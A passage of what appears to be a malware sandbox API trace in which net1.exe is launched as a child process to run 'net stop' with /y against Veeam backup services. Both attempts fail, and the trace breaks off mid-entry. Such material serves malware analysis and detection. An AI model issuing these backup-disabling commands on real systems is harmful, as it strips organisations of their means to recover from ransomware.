out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0119.002] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.002] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fa08 | out: Buffer=0x26fa08*=0x3b4d50) returned 0x0 [0119.002] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fa08 | out: Buffer=0x26fa08*=0x3bc100) returned 0x0 [0119.002] _fileno (_File=0x7fefdba2a80) returned 0 [0119.002] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0119.002] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.002] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.003] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.003] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.003] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.003] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.003] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.003] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.003] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.003] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.003] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.003] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.003] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.003] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.003] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.003] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.003] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.003] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.003] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.003] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.003] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.003] _wcsicmp (_String1="accounts", _String2="VeeamMountSvc") returned -21 [0119.003] _wcsicmp (_String1="computer", _String2="VeeamMountSvc") returned -19 [0119.003] _wcsicmp (_String1="config", _String2="VeeamMountSvc") returned -19 [0119.003] _wcsicmp (_String1="continue", _String2="VeeamMountSvc") returned -19 [0119.003] _wcsicmp (_String1="cont", _String2="VeeamMountSvc") returned -19 [0119.003] _wcsicmp (_String1="file", _String2="VeeamMountSvc") returned -16 [0119.003] _wcsicmp (_String1="files", _String2="VeeamMountSvc") returned -16 [0119.003] _wcsicmp (_String1="group", _String2="VeeamMountSvc") returned -15 [0119.003] _wcsicmp (_String1="groups", _String2="VeeamMountSvc") returned -15 [0119.003] _wcsicmp (_String1="help", _String2="VeeamMountSvc") returned -14 [0119.003] _wcsicmp (_String1="helpmsg", _String2="VeeamMountSvc") returned -14 [0119.003] _wcsicmp (_String1="localgroup", _String2="VeeamMountSvc") returned -10 [0119.003] _wcsicmp (_String1="pause", _String2="VeeamMountSvc") returned -6 [0119.003] _wcsicmp (_String1="session", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="sessions", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="sess", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="share", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="start", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="stats", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="statistics", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="stop", _String2="VeeamMountSvc") returned -3 [0119.003] _wcsicmp (_String1="time", _String2="VeeamMountSvc") returned -2 [0119.003] _wcsicmp (_String1="user", _String2="VeeamMountSvc") returned -1 [0119.003] _wcsicmp (_String1="users", _String2="VeeamMountSvc") returned -1 [0119.003] _wcsicmp (_String1="msg", _String2="VeeamMountSvc") returned -9 [0119.003] _wcsicmp (_String1="messenger", _String2="VeeamMountSvc") returned -9 [0119.004] _wcsicmp (_String1="receiver", _String2="VeeamMountSvc") returned -4 [0119.004] _wcsicmp (_String1="rcv", _String2="VeeamMountSvc") returned -4 [0119.004] _wcsicmp (_String1="netpopup", _String2="VeeamMountSvc") returned -8 [0119.004] _wcsicmp (_String1="redirector", _String2="VeeamMountSvc") returned -4 [0119.004] _wcsicmp (_String1="redir", _String2="VeeamMountSvc") returned -4 [0119.004] _wcsicmp (_String1="rdr", _String2="VeeamMountSvc") returned -4 [0119.004] _wcsicmp (_String1="workstation", _String2="VeeamMountSvc") returned 1 [0119.004] _wcsicmp (_String1="work", _String2="VeeamMountSvc") returned 1 [0119.004] _wcsicmp (_String1="wksta", _String2="VeeamMountSvc") returned 1 [0119.004] _wcsicmp (_String1="prdr", _String2="VeeamMountSvc") returned -6 [0119.004] _wcsicmp (_String1="devrdr", _String2="VeeamMountSvc") returned -18 [0119.004] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamMountSvc") returned -10 [0119.004] _wcsicmp (_String1="server", _String2="VeeamMountSvc") returned -3 [0119.004] _wcsicmp (_String1="svr", _String2="VeeamMountSvc") returned -3 [0119.004] _wcsicmp (_String1="srv", _String2="VeeamMountSvc") returned -3 [0119.004] _wcsicmp (_String1="lanmanserver", _String2="VeeamMountSvc") returned -10 [0119.004] _wcsicmp (_String1="alerter", _String2="VeeamMountSvc") returned -21 [0119.004] _wcsicmp (_String1="netlogon", _String2="VeeamMountSvc") returned -8 [0119.004] _wcsupr (in: _String="VeeamMountSvc" | out: _String="VEEAMMOUNTSVC") returned="VEEAMMOUNTSVC" [0119.004] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3bce10 [0119.007] GetServiceKeyNameW (in: hSCManager=0x3bce10, lpDisplayName="VEEAMMOUNTSVC", lpServiceName=0xff6b5750, lpcchBuffer=0x26f928 | out: lpServiceName="", lpcchBuffer=0x26f928) returned 0 [0119.008] _wcsicmp (_String1="msg", _String2="VEEAMMOUNTSVC") returned -9 [0119.008] _wcsicmp (_String1="messenger", _String2="VEEAMMOUNTSVC") returned -9 [0119.008] _wcsicmp (_String1="receiver", _String2="VEEAMMOUNTSVC") returned -4 [0119.008] _wcsicmp (_String1="rcv", _String2="VEEAMMOUNTSVC") returned -4 [0119.008] _wcsicmp (_String1="redirector", _String2="VEEAMMOUNTSVC") returned -4 [0119.008] _wcsicmp (_String1="redir", _String2="VEEAMMOUNTSVC") returned -4 [0119.008] _wcsicmp (_String1="rdr", _String2="VEEAMMOUNTSVC") returned -4 [0119.008] _wcsicmp (_String1="workstation", _String2="VEEAMMOUNTSVC") returned 1 [0119.008] _wcsicmp (_String1="work", _String2="VEEAMMOUNTSVC") returned 1 [0119.008] _wcsicmp (_String1="wksta", _String2="VEEAMMOUNTSVC") returned 1 [0119.008] _wcsicmp (_String1="prdr", _String2="VEEAMMOUNTSVC") returned -6 [0119.008] _wcsicmp (_String1="devrdr", _String2="VEEAMMOUNTSVC") returned -18 [0119.008] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMMOUNTSVC") returned -10 [0119.008] _wcsicmp (_String1="server", _String2="VEEAMMOUNTSVC") returned -3 [0119.009] _wcsicmp (_String1="svr", _String2="VEEAMMOUNTSVC") returned -3 [0119.009] _wcsicmp (_String1="srv", _String2="VEEAMMOUNTSVC") returned -3 [0119.009] _wcsicmp (_String1="lanmanserver", _String2="VEEAMMOUNTSVC") returned -10 [0119.009] _wcsicmp (_String1="alerter", _String2="VEEAMMOUNTSVC") returned -21 [0119.009] _wcsicmp (_String1="netlogon", _String2="VEEAMMOUNTSVC") returned -8 [0119.009] NetServiceControl (in: servername=0x0, service="VEEAMMOUNTSVC", opcode=0x0, arg=0x0, bufptr=0x26f930 | out: bufptr=0x26f930) returned 0x889 [0119.009] wcscpy_s (in: _Destination=0xff6b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.009] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0119.010] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff6b5b50, nSize=0x800, Arguments=0xff6b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.042] GetFileType (hFile=0xb) returned 0x2 [0119.050] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7f8 | out: lpMode=0x26f7f8) returned 1 [0119.050] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f7f0, lpReserved=0x0 | out: lpBuffer=0xff6b5b50*, lpNumberOfCharsWritten=0x26f7f0*=0x1e) returned 1 [0119.050] GetFileType (hFile=0xb) returned 0x2 [0119.050] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7f8 | out: lpMode=0x26f7f8) returned 1 [0119.050] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff691efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f7f0, lpReserved=0x0 | out: lpBuffer=0xff691efc*, lpNumberOfCharsWritten=0x26f7f0*=0x2) returned 1 [0119.051] _ultow (in: _Dest=0x889, _Radix=2553952 | out: _Dest=0x889) returned="2185" [0119.051] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff6b5b50, nSize=0x800, Arguments=0xff6b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.051] GetFileType (hFile=0xb) returned 0x2 [0119.051] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7f8 | out: lpMode=0x26f7f8) returned 1 [0119.051] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff6b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f7f0, lpReserved=0x0 | out: lpBuffer=0xff6b5b50*, lpNumberOfCharsWritten=0x26f7f0*=0x34) returned 1 [0119.051] GetFileType (hFile=0xb) returned 0x2 [0119.052] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26f7f8 | out: lpMode=0x26f7f8) returned 1 [0119.052] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff691efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f7f0, lpReserved=0x0 | out: lpBuffer=0xff691efc*, lpNumberOfCharsWritten=0x26f7f0*=0x2) returned 1 [0119.052] NetApiBufferFree (Buffer=0x3b4d50) returned 0x0 [0119.052] NetApiBufferFree (Buffer=0x3bc100) returned 0x0 [0119.052] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" [0119.052] exit (_Code=2) Process: id = "349" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x4fe57000" os_pid = "0x3c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "342" os_parent_pid = "0xc14" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamEnterpriseManagerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12251 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12252 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12253 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12254 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12255 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12256 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12257 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12258 start_va = 0xff690000 end_va = 0xff6c2fff entry_point = 0xff690000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12259 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12260 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12261 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 12262 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12263 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12264 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12265 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 12266 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12267 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12268 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12269 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12289 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12290 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 12291 start_va = 0x640000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 12292 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12293 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12294 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12295 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12296 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12297 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12298 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12299 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12300 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12301 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12302 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12303 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12304 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12305 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12306 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12307 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12327 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 880 os_tid = 0x944 [0118.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fb30 | out: lpSystemTimeAsFileTime=0x24fb30*(dwLowDateTime=0xfc022eb0, dwHighDateTime=0x1d48689)) [0118.892] GetCurrentProcessId () returned 0x3c8 [0118.892] GetCurrentThreadId () returned 0x944 [0118.892] GetTickCount () returned 0x27628 [0118.892] QueryPerformanceCounter (in: lpPerformanceCount=0x24fb38 | out: lpPerformanceCount=0x24fb38*=1816581000000) returned 1 [0118.893] GetModuleHandleW (lpModuleName=0x0) returned 0xff690000 [0118.893] __set_app_type (_Type=0x1) [0118.893] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff6a9c9c) returned 0x0 [0118.893] __getmainargs (in: _Argc=0xff6b4780, _Argv=0xff6b4790, _Env=0xff6b4788, _DoWildCard=0, _StartInfo=0xff6b479c | out: _Argc=0xff6b4780, _Argv=0xff6b4790, _Env=0xff6b4788) returned 0 [0118.893] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.893] GetConsoleOutputCP () returned 0x1b5 [0118.900] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff6bcec0 | out: lpCPInfo=0xff6bcec0) returned 1 [0118.900] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0118.902] sprintf_s (in: _DstBuf=0x24fad8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0118.902] setlocale (category=0, locale=".437") returned="English_United States.437" [0118.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.905] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0118.905] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamEnterpriseManagerSvc /y" [0118.905] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f870, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0118.905] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0118.905] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fac8 | out: Buffer=0x24fac8*=0x3bc0f0) returned 0x0 [0118.905] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fac8 | out: Buffer=0x24fac8*=0x3bc110) returned 0x0 [0118.905] _fileno (_File=0x7fefdba2a80) returned 0 [0118.905] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0118.905] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0118.905] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0118.905] _wcsicmp (_String1="config", _String2="stop") returned -16 [0118.905] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0118.905] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0118.906] _wcsicmp (_String1="file", _String2="stop") returned -13 [0118.906] _wcsicmp (_String1="files", _String2="stop") returned -13 [0118.906] _wcsicmp (_String1="group", _String2="stop") returned -12 [0118.906] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0118.906] _wcsicmp (_String1="help", _String2="stop") returned -11 [0118.906] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0118.906] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0118.906] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0118.906] _wcsicmp (_String1="session", _String2="stop") returned -15 [0118.906] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0118.906] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0118.906] _wcsicmp (_String1="share", _String2="stop") returned -12 [0118.906] _wcsicmp (_String1="start", _String2="stop") returned -14 [0118.906] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0118.906] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0118.906] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0118.906] _wcsicmp (_String1="accounts", _String2="VeeamEnterpriseManagerSvc") returned -21 [0118.906] _wcsicmp (_String1="computer", _String2="VeeamEnterpriseManagerSvc") returned -19 [0118.906] _wcsicmp (_String1="config", _String2="VeeamEnterpriseManagerSvc") returned -19 [0118.906] _wcsicmp (_String1="continue", _String2="VeeamEnterpriseManagerSvc") returned -19 [0118.906] _wcsicmp (_String1="cont", _String2="VeeamEnterpriseManagerSvc") returned -19 [0118.906] _wcsicmp (_String1="file", _String2="VeeamEnterpriseManagerSvc") returned -16 [0118.906] _wcsicmp (_String1="files", _String2="VeeamEnterpriseManagerSvc") returned -16 [0118.906] _wcsicmp (_String1="group", _String2="VeeamEnterpriseManagerSvc") returned -15 [0118.906] _wcsicmp (_String1="groups", _String2="VeeamEnterpriseManagerSvc") returned -15 [0118.906] _wcsicmp (_String1="help", _String2="VeeamEnterpriseManagerSvc") returned -14 [0118.906] _wcsicmp (_String1="helpmsg", _String2="VeeamEnterpriseManagerSvc") returned -14 [0118.906] _wcsicmp (_String1="localgroup", _String2="VeeamEnterpriseManagerSvc") returned -10 [0118.906] _wcsicmp (_String1="pause", _String2="VeeamEnterpriseManagerSvc") returned -6 [0118.906] _wcsicmp (_String1="session", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="sessions", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="sess", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="share", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="start", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="stats", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="statistics", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="stop", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.906] _wcsicmp (_String1="time", _String2="VeeamEnterpriseManagerSvc") returned -2 [0118.906] _wcsicmp (_String1="user", _String2="VeeamEnterpriseManagerSvc") returned -1 [0118.907] _wcsicmp (_String1="users", _String2="VeeamEnterpriseManagerSvc") returned -1 [0118.907] _wcsicmp (_String1="msg", _String2="VeeamEnterpriseManagerSvc") returned -9 [0118.907] _wcsicmp (_String1="messenger", _String2="VeeamEnterpriseManagerSvc") returned -9 [0118.907] _wcsicmp (_String1="receiver", _String2="VeeamEnterpriseManagerSvc") returned -4 [0118.907] _wcsicmp (_String1="rcv", _String2="VeeamEnterpriseManagerSvc") returned -4 [0118.907] _wcsicmp (_String1="netpopup", _String2="VeeamEnterpriseManagerSvc") returned -8 [0118.907] _wcsicmp (_String1="redirector", _String2="VeeamEnterpriseManagerSvc") returned -4 [0118.907] _wcsicmp (_String1="redir", _String2="VeeamEnterpriseManagerSvc") returned -4 [0118.907] _wcsicmp (_String1="rdr", _String2="VeeamEnterpriseManagerSvc") returned -4 [0118.907] _wcsicmp (_String1="workstation", _String2="VeeamEnterpriseManagerSvc") returned 1 [0118.907] _wcsicmp (_String1="work", _String2="VeeamEnterpriseManagerSvc") returned 1 [0118.907] _wcsicmp (_String1="wksta", _String2="VeeamEnterpriseManagerSvc") returned 1 [0118.907] _wcsicmp (_String1="prdr", _String2="VeeamEnterpriseManagerSvc") returned -6 [0118.907] _wcsicmp (_String1="devrdr", _String2="VeeamEnterpriseManagerSvc") returned -18 [0118.907] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamEnterpriseManagerSvc") returned -10 [0118.907] _wcsicmp (_String1="server", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.907] _wcsicmp (_String1="svr", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.907] _wcsicmp (_String1="srv", _String2="VeeamEnterpriseManagerSvc") returned -3 [0118.907] _wcsicmp (_String1="lanmanserver", _String2="VeeamEnterpriseManagerSvc") returned -10 [0118.907] _wcsicmp (_String1="alerter", _String2="VeeamEnterpriseManagerSvc") returned -21 [0118.907] _wcsicmp (_String1="netlogon", _String2="VeeamEnterpriseManagerSvc") returned -8 [0118.907] _wcsupr (in: _String="VeeamEnterpriseManagerSvc" | out: _String="VEEAMENTERPRISEMANAGERSVC") returned="VEEAMENTERPRISEMANAGERSVC" [0118.907] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3bce20 [0118.923] GetServiceKeyNameW (in: hSCManager=0x3bce20, lpDisplayName="VEEAMENTERPRISEMANAGERSVC", lpServiceName=0xff6b5750, lpcchBuffer=0x24f9e8 | out: lpServiceName="", lpcchBuffer=0x24f9e8) returned 0 [0118.924] _wcsicmp (_String1="msg", _String2="VEEAMENTERPRISEMANAGERSVC") returned -9 [0118.924] _wcsicmp (_String1="messenger", _String2="VEEAMENTERPRISEMANAGERSVC") returned -9 [0118.924] _wcsicmp (_String1="receiver", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0118.924] _wcsicmp (_String1="rcv", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0118.924] _wcsicmp (_String1="redirector", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0118.924] _wcsicmp (_String1="redir", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0118.924] _wcsicmp (_String1="rdr", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0118.924] _wcsicmp (_String1="workstation", _String2="VEEAMENTERPRISEMANAGERSVC") returned 1 [0118.924] _wcsicmp (_String1="work", _String2="VEEAMENTERPRISEMANAGERSVC") returned 1 [0118.924] _wcsicmp (_String1="wksta", _String2="VEEAMENTERPRISEMANAGERSVC") returned 1 [0118.924] _wcsicmp (_String1="prdr", _String2="VEEAMENTERPRISEMANAGERSVC") returned -6 [0118.924] _wcsicmp (_String1="devrdr", _String2="VEEAMENTERPRISEMANAGERSVC") returned -18 [0118.924] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMENTERPRISEMANAGERSVC") returned -10 [0118.924] _wcsicmp (_String1="server", _String2="VEEAMENTERPRISEMANAGERSVC") returned -3 [0118.924] _wcsicmp (_String1="svr", 